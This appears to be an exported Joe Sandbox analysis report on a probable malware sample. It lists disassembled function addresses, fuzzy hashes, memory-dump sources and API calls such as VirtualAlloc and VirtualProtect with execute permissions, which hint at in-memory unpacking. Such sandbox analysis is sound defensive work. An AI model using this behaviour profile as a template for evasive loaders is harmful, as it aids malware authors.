Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 485a32b547078cfbe831a0a9ade745c6337b17f025fc704b3b1125bf43b7976e
Instruction ID: cd5d031751ea870a61a7d4100524778f6358ef88cd4e2a1c594936d3688603b0
Opcode Fuzzy Hash: 485a32b547078cfbe831a0a9ade745c6337b17f025fc704b3b1125bf43b7976e
Instruction Fuzzy Hash: 6A117F70A04269DFDB25CB65EC94AEAB7B0AB45300F2040EFD149A7242DA745ED5CF11

Function 004071E8 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: d2e99ac6256d0a7d39fccb270f2fc7ac41bd82ed4ad80516182ddf7d2959af27
Instruction ID: 597c9013eb682f45a94fe761983bdc02ce4bdebba091caedd36097ed53851130
Opcode Fuzzy Hash: d2e99ac6256d0a7d39fccb270f2fc7ac41bd82ed4ad80516182ddf7d2959af27
Instruction Fuzzy Hash: E20144F1E18218ABD7208A50DC81EEB7B78EB55304F1441FBE94E62680D5396F818FA3

Function 004071B6 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b90901113764cd49bbeb5faf1b2e5cfe7156d612a9053401008c56ac3d088e0d
Instruction ID: 6e593ad78f11266b3d0d5a0e6c0c9e800c832fa8ae5a062fae9fe734989720c2
Opcode Fuzzy Hash: b90901113764cd49bbeb5faf1b2e5cfe7156d612a9053401008c56ac3d088e0d
Instruction Fuzzy Hash: 100148F1E18218ABD7208A50DC41EEB7B78DB55304F1441FBE94EA1680D5396F818FA3

Function 0040720D Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 51f71612e2857585a5d4d5d8945cf98c33817d09fb682abd9b2d9f92641cf950
Instruction ID: f12e0ca71b6847934ea0494068f75b96b62ed845ec6b8c07d59b42710ea1b0c8
Opcode Fuzzy Hash: 51f71612e2857585a5d4d5d8945cf98c33817d09fb682abd9b2d9f92641cf950
Instruction Fuzzy Hash: A80144F1E18218ABD7208A50DC91EEB7B78EB55304F1441FBE94E62680D5396F818FA3

Function 0040695C Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 855f5e80f9541c96a3a2d822a5a811061b195c471eb266dac1a6c7715dd1f34c
Instruction ID: 274cb89beb1a3e6ab73d69a877b76f261775b139f2f77444169076f95774e751
Opcode Fuzzy Hash: 855f5e80f9541c96a3a2d822a5a811061b195c471eb266dac1a6c7715dd1f34c
Instruction Fuzzy Hash: 7401D6F1E18214ABE7108A50DC82FEB7B78EB55304F1441BBE90E61680D13D6E854BA3

Function 004201CB Relevance: 1.5, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 7a9ea11f322c8a829551b9b54ecbe6dd23da0f0eb2d9c6ba193f36ba04a269a3
Instruction ID: 544e10bf16d661ead35c34841ea820961fc07b711cd9a117e8f26bd388227f72
Opcode Fuzzy Hash: 7a9ea11f322c8a829551b9b54ecbe6dd23da0f0eb2d9c6ba193f36ba04a269a3
Instruction Fuzzy Hash: 54016970E04669CBEB24CB95EC84AEAF7B1BB88300F1081EBD05DA7241CA745EC1CF15

Function 004074C4 Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004074F1

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 55a8861f1dcad2f356bc3d61f64511ec5ac83e40df81549a46bac06715186c02
Instruction ID: 25211521b3aac59db9137579fb048d154c1f79c3e79b1b3f0576d00875a9e760
Opcode Fuzzy Hash: 55a8861f1dcad2f356bc3d61f64511ec5ac83e40df81549a46bac06715186c02
Instruction Fuzzy Hash: 57F037F1E14528ABD710CA95CC51FE6B7BCEF55304F0051EBE54AE2680D139AF818F91

Function 0042026D Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0042026E

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c91b693d5b86d2ae11cf6c47b3df95c23ceaa6344db94eb5af2c9422f4b8f2d4
Instruction ID: b19b272ba7b8afd569ed7e5b3ccce1395f6120d56c9f6e3fe858b590bc848e8d
Opcode Fuzzy Hash: c91b693d5b86d2ae11cf6c47b3df95c23ceaa6344db94eb5af2c9422f4b8f2d4
Instruction Fuzzy Hash: C29002A095C21786D76C1B60490C56A67345B45201F1105A9900660441467AAA415917

Function 0041CD15 Relevance: 1.5, APIs: 1, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63bc6c53ace1f96f468e36bb05d3ea0da271d94e9b453ac4716fbbf942ad69cd
Instruction ID: 2182a2bc2951b1d0c05ec37bfccbb6c8ce83d6ef750507758993ef2868f7758a
Opcode Fuzzy Hash: 63bc6c53ace1f96f468e36bb05d3ea0da271d94e9b453ac4716fbbf942ad69cd
Instruction Fuzzy Hash: 5BB13CB5D412289FEB24CB04CD90BEAB7B5AB88314F1081EAD80D67340D639AFD2CF45

Function 0041D096 Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: aa7e30c676aceae8454a2925895b9f5c4b08368b89e8b5c03fe791a78a9e317b
Instruction ID: 2c36e2ef7949768e12a41f281801e4518b13919899cc75e126bbf136d0b10824
Opcode Fuzzy Hash: aa7e30c676aceae8454a2925895b9f5c4b08368b89e8b5c03fe791a78a9e317b
Instruction Fuzzy Hash: 1F61E2F2D042249FE7248A14DC85BEBBB78EB85314F1481FAD80D56640DA3D9EC1CE56

Function 0041D130 Relevance: 1.4, APIs: 1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 39ff5318d904d516bc369f7d4827446bc9ba78b461e458f8c4452cc7e08be521
Instruction ID: 3433568bdd03d9e58387906f7710b1891c9d69a8965d2e77df8ce32132d6582c
Opcode Fuzzy Hash: 39ff5318d904d516bc369f7d4827446bc9ba78b461e458f8c4452cc7e08be521
Instruction Fuzzy Hash: 5A51C0F2D042249FE7648A14DC95BEABB74EB84314F1481FAD80E16680DA3C9FC2CF56

Function 0041D1C0 Relevance: 1.4, APIs: 1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0467bd9a255d1a34fee10fea58436218394323cdcf1befe17efbfd0023b53e75
Instruction ID: c882dc5e11c2c7d98907ed4a7ac6dc61bef33483b0425c8da7a57d6d56d4f739
Opcode Fuzzy Hash: 0467bd9a255d1a34fee10fea58436218394323cdcf1befe17efbfd0023b53e75
Instruction Fuzzy Hash: 7441DDF1D042249FEB608B18DC94BEABB74AF80314F2441FAD50D57240DA38AEC2CF96

Function 0041D4DA Relevance: 1.3, APIs: 1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 40abeb67ee043aea32e8690ca285f100373b4414e2d1248687a44cf818d667f1
Instruction ID: 71719418a1b4fb13aa7b5aa533180aacdd603228149514a4ad730b87de8a9586
Opcode Fuzzy Hash: 40abeb67ee043aea32e8690ca285f100373b4414e2d1248687a44cf818d667f1
Instruction Fuzzy Hash: AF31BAB1E042289FEB649B04DC94BEABB35EF81314F2040EAD50D57240DA799EC2CF46

Function 0041D500 Relevance: 1.3, APIs: 1, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5ce2823a7871b2acd5e3e1b2dc81427670d575952ac963192ea187050240a4fb
Instruction ID: dac66cc95bc8b01d603d776b89c768c4ce343fb921c84495077b8fc2c16ab045
Opcode Fuzzy Hash: 5ce2823a7871b2acd5e3e1b2dc81427670d575952ac963192ea187050240a4fb
Instruction Fuzzy Hash: 68318CB5D452289FDB649F04CC50BEABB71AF85314F2040EAD40D57240CA399ED2CF46

Function 0041D10B Relevance: 1.3, APIs: 1, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2d23705379fc4fb457e9e4454beea901acb2ecf30b8a6bed61fe92c9f92d011e
Instruction ID: c8ee4a4fd1a5268f81d9b6f1173ded6ec42534c51f760a9137365c36237a247a
Opcode Fuzzy Hash: 2d23705379fc4fb457e9e4454beea901acb2ecf30b8a6bed61fe92c9f92d011e
Instruction Fuzzy Hash: B521FFF2D042249FE7649B08CC65BEABB34AF80314F1400F6E80D67240CA79AED1CF46

Function 0041CCCC Relevance: 1.3, APIs: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3e1301a223ec8c480cd37c99b0d67b72b36870dea40e8f68b6058af4725b6416
Instruction ID: b04d92052e1a9242fcd62b235eb6ce943607c460441f50c781c8d2ff644ed56f
Opcode Fuzzy Hash: 3e1301a223ec8c480cd37c99b0d67b72b36870dea40e8f68b6058af4725b6416
Instruction Fuzzy Hash: C721FDF2E442248FEB649A18CC54BEABB31AB81314F2040F6D40D57240DA789EC2CF46

Function 0041CCD3 Relevance: 1.3, APIs: 1, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3b4ae8e346aa4bffae6b03aeaf2bee0d1cebb9923c008a3c251d92ab6b1c5bd3
Instruction ID: 628a473148a750b3b4515e2ac1f6f0476f85678b521c9c4d520b8b01f3e2013b
Opcode Fuzzy Hash: 3b4ae8e346aa4bffae6b03aeaf2bee0d1cebb9923c008a3c251d92ab6b1c5bd3
Instruction Fuzzy Hash: 2821FFB2E442248FEB649B18CC58BE9BB31AF81314F2040E6D40D57280CA789EC2CF46

Function 0041D550 Relevance: 1.3, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0041D846

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: af9d9f517decce8a9a49804e3b39d00a2dc17a89163b4f6fa57c493975b4d132
Instruction ID: 90fc563921f5a7bfe076efa3264523c28a58b333f6b94fd82723dedf2e7d7a6d
Opcode Fuzzy Hash: af9d9f517decce8a9a49804e3b39d00a2dc17a89163b4f6fa57c493975b4d132
Instruction Fuzzy Hash: E721CDB5E452248FEBA4DB04CC94BEABB75AF84314F2040E6D40D67240CA38AEC2CF46

Non-executed Functions

Function 00448A60 Relevance: 127.0, APIs: 84, Instructions: 998filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,80000080,00000000,000000FF,?,?), ref: 00448A88
GetFileSize.KERNEL32(00000000,?), ref: 00448AA8
_memset.LIBCMT ref: 00448B0B
